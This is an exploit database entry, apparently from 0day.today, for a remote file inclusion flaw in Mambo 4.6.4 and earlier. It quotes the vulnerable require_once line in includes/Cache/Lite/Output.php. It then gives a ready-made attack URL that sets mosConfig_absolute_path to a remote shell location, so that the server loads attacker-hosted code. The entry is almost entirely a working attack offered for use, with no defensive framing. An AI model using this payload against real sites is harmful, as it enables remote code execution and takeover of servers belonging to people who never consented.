Mambo <= 4.6.4 (Output.php) Remote File Inclusion Vulnerability

2008-06-13T00:00:00
ID 1337DAY-ID-3176
Type zdt
Reporter irk4z
Modified 2008-06-13T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
Mambo <= 4.6.4 (Output.php) Remote File Inclusion Vulnerability
===============================================================



.-----------------------------------------------------------------------------.
|  vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability                  |
|  download: http://mambo-foundation.org/                                     |
|                                                                             |
|                                                                             |
|  greets to: all friends  ;)                                                   |
'-----------------------------------------------------------------------------'

# code:

 /includes/Cache/Lite/Output.php :
 1     <?php
 2
 3     /**
 4     * This class extends Cache_Lite and uses output buffering to get the data to cache.
 5     *
 6     * There are some examples in the 'docs/examples' file
 7     * Technical choices are described in the 'docs/technical' file
 8     *
 9     * @package Cache_Lite
10     * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $
11
12     */
13
14     require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php');
   ...
   
^ no comment.. RFI in line 14..

# exploit:

 http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?



#  0day.today [2018-02-16]  #